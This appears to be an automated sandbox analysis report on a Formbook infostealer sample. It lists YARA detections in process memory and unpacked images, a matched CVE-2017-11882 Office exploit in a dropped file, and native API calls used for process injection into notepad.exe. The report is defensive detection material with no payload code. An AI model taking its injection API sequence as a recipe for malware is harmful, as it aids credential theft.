Source: 9.0.notepad.exe.400000.1.unpack, type: UNPACKEDPE Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 9.0.notepad.exe.400000.1.unpack, type: UNPACKEDPE Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 9.0.notepad.exe.400000.5.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 9.0.notepad.exe.400000.5.unpack, type: UNPACKEDPE Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 9.0.notepad.exe.400000.5.unpack, type: UNPACKEDPE Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 9.0.notepad.exe.400000.2.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 9.0.notepad.exe.400000.2.unpack, type: UNPACKEDPE Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 9.0.notepad.exe.400000.2.unpack, type: UNPACKEDPE Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 9.0.notepad.exe.400000.1.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 9.0.notepad.exe.400000.1.raw.unpack, type: UNPACKEDPE Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 9.0.notepad.exe.400000.1.raw.unpack, type: UNPACKEDPE Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 9.0.notepad.exe.400000.4.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 9.0.notepad.exe.400000.4.raw.unpack, type: UNPACKEDPE Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 9.0.notepad.exe.400000.4.raw.unpack, type: UNPACKEDPE Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000009.00000002.1043439197.0000000000150000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000009.00000002.1043439197.0000000000150000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000009.00000002.1043439197.0000000000150000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000009.00000000.948702057.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000009.00000000.948702057.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000009.00000000.948702057.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000009.00000000.947984971.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000009.00000000.947984971.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000009.00000000.947984971.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 0000000B.00000002.1175369847.0000000000260000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 0000000B.00000002.1175369847.0000000000260000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 0000000B.00000002.1175369847.0000000000260000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000009.00000002.1043648372.00000000002C0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000009.00000002.1043648372.00000000002C0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000009.00000002.1043648372.00000000002C0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000009.00000000.939194134.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000009.00000000.939194134.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000009.00000000.939194134.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000009.00000000.938868025.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000009.00000000.938868025.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000009.00000000.938868025.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000009.00000002.1043727096.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000009.00000002.1043727096.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000009.00000002.1043727096.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 0000000B.00000002.1175496063.0000000000290000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 0000000B.00000002.1175496063.0000000000290000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 0000000B.00000002.1175496063.0000000000290000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000009.00000000.948326848.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000009.00000000.948326848.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000009.00000000.948326848.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000006.00000002.958771208.0000000003666000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000006.00000002.958771208.0000000003666000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000006.00000002.958771208.0000000003666000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 0000000B.00000002.1175083933.0000000000080000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 0000000B.00000002.1175083933.0000000000080000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 0000000B.00000002.1175083933.0000000000080000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 0000000A.00000000.987721089.0000000002992000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 0000000A.00000000.987721089.0000000002992000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 0000000A.00000000.987721089.0000000002992000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 0000000A.00000000.1004582452.0000000002992000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 0000000A.00000000.1004582452.0000000002992000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 0000000A.00000000.1004582452.0000000002992000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: Process Memory Space: Client.exe PID: 316, type: MEMORYSTR Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: Process Memory Space: notepad.exe PID: 2188, type: MEMORYSTR Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: Process Memory Space: ipconfig.exe PID: 1800, type: MEMORYSTR Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRF{4F98E955-E40B-4BEE-AA1E-253D7E3CD6E7}.tmp, type: DROPPED Matched rule: rtf_cve2017_11882_ole author = John Davison, description = Attempts to identify the exploit CVE 2017 11882, score = , sample = 51cf2a6c0c1a29abca9fd13cb22421da, reference = https://embedi.com/blog/skeleton-closet-ms-office-vulnerability-you-didnt-know-about
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRF{4F98E955-E40B-4BEE-AA1E-253D7E3CD6E7}.tmp, type: DROPPED Matched rule: EXP_potential_CVE_2017_11882 author = ReversingLabs, reference = https://www.reversinglabs.com/newsroom/news/reversinglabs-yara-rule-detects-cobalt-strike-payload-exploiting-cve-2017-11882.html
Source: C:\Windows\SysWOW64\notepad.exe Code function: String function: 00AF3F92 appears 132 times
Source: C:\Windows\SysWOW64\notepad.exe Code function: String function: 00AF373B appears 245 times
Source: C:\Windows\SysWOW64\notepad.exe Code function: String function: 00AAE2A8 appears 38 times
Source: C:\Windows\SysWOW64\notepad.exe Code function: String function: 00B1F970 appears 84 times
Source: C:\Windows\SysWOW64\notepad.exe Code function: String function: 00AADF5C appears 121 times
Source: C:\Users\user\AppData\Local\Temp\Client.exe Code function: 6_2_00322548 NtQuerySystemInformation, 6_2_00322548
Source: C:\Users\user\AppData\Local\Temp\Client.exe Code function: 6_2_00322540 NtQuerySystemInformation, 6_2_00322540
Source: C:\Users\user\AppData\Local\Temp\Client.exe Code function: 6_2_0037F248 NtResumeThread, 6_2_0037F248
Source: C:\Users\user\AppData\Local\Temp\Client.exe Code function: 6_2_0037D898 NtWriteVirtualMemory, 6_2_0037D898
Source: C:\Users\user\AppData\Local\Temp\Client.exe Code function: 6_2_0037CE80 NtAllocateVirtualMemory, 6_2_0037CE80
Source: C:\Users\user\AppData\Local\Temp\Client.exe Code function: 6_2_0037D398 NtProtectVirtualMemory, 6_2_0037D398
Source: C:\Users\user\AppData\Local\Temp\Client.exe Code function: 6_2_0037DD98 NtSetContextThread, 6_2_0037DD98
Source: C:\Users\user\AppData\Local\Temp\Client.exe Code function: 6_2_004A0178 NtClose, 6_2_004A0178
Source: C:\Users\user\AppData\Local\Temp\Client.exe Code function: 6_2_0240B2E0 NtWriteVirtualMemory, 6_2_0240B2E0
Source: C:\Users\user\AppData\Local\Temp\Client.exe Code function: 6_2_0240B7B0 NtCreateThreadEx, 6_2_0240B7B0
Source: C:\Windows\SysWOW64\notepad.exe Code function: 9_2_0041A360 NtCreateFile, 9_2_0041A360
Source: C:\Windows\SysWOW64\notepad.exe Code function: 9_2_0041A410 NtReadFile, 9_2_0041A410
Source: C:\Windows\SysWOW64\notepad.exe Code function: 9_2_0041A490 NtClose, 9_2_0041A490
Source: C:\Windows\SysWOW64\notepad.exe Code function: 9_2_0041A540 NtAllocateVirtualMemory, 9_2_0041A540
Source: C:\Windows\SysWOW64\notepad.exe Code function: 9_2_0041A35A NtCreateFile, 9_2_0041A35A
Source: C:\Windows\SysWOW64\notepad.exe Code function: 9_2_0041A40A NtReadFile, 9_2_0041A40A
Source: C:\Windows\SysWOW64\notepad.exe Code function: 9_2_0041A48F NtClose, 9_2_0041A48F
Source: C:\Windows\SysWOW64\notepad.exe Code function: 9_2_0041A53C NtAllocateVirtualMemory, 9_2_0041A53C
Source: C:\Windows\SysWOW64\notepad.exe Code function: 9_2_00AA00C4 NtCreateFile,LdrInitializeThunk, 9_2_00AA00C4
Source: C:\Windows\SysWOW64\notepad.exe Code function: 9_2_00AA0078 NtResumeThread,LdrInitializeThunk, 9_2_00AA0078
Source: C:\Windows\SysWOW64\notepad.exe Code function: 9_2_00AA0048 NtProtectVirtualMemory,LdrInitializeThunk, 9_2_00AA0048
Source: C:\Windows\SysWOW64\notepad.exe Code function: 9_2_00A9F9F0 NtClose,LdrInitializeThunk, 9_2_00A9F9F0
Source: C:\Windows\SysWOW64\notepad.exe Code function: 9_2_00A9F900 NtReadFile,LdrInitializeThunk, 9_2_00A9F900
Source: C:\Windows\SysWOW64\notepad.exe Code function: 9_2_00A9FAE8 NtQueryInformationProcess,LdrInitializeThunk, 9_2_00A9FAE8
Source: C:\Windows\SysWOW64\notepad.exe Code function: 9_2_00A9FAD0 NtAllocateVirtualMemory,LdrInitializeThunk, 9_2_00A9FAD0
Source: C:\Windows\SysWOW64\notepad.exe Code function: 9_2_00A9FBB8 NtQueryInformationToken,LdrInitializeThunk, 9_2_00A9FBB8
Source: C:\Windows\SysWOW64\notepad.exe Code function: 9_2_00A9FB68 NtFreeVirtualMemory,LdrInitializeThunk, 9_2_00A9FB68
Source: C:\Windows\SysWOW64\notepad.exe Code function: 9_2_00A9FC90 NtUnmapViewOfSection,LdrInitializeThunk, 9_2_00A9FC90
Source: C:\Windows\SysWOW64\notepad.exe Code function: 9_2_00A9FC60 NtMapViewOfSection,LdrInitializeThunk, 9_2_00A9FC60
Source: C:\Windows\SysWOW64\notepad.exe Code function: 9_2_00A9FD8C NtDelayExecution,LdrInitializeThunk, 9_2_00A9FD8C
Source: C:\Windows\SysWOW64\notepad.exe Code function: 9_2_00A9FDC0 NtQuerySystemInformation,LdrInitializeThunk, 9_2_00A9FDC0
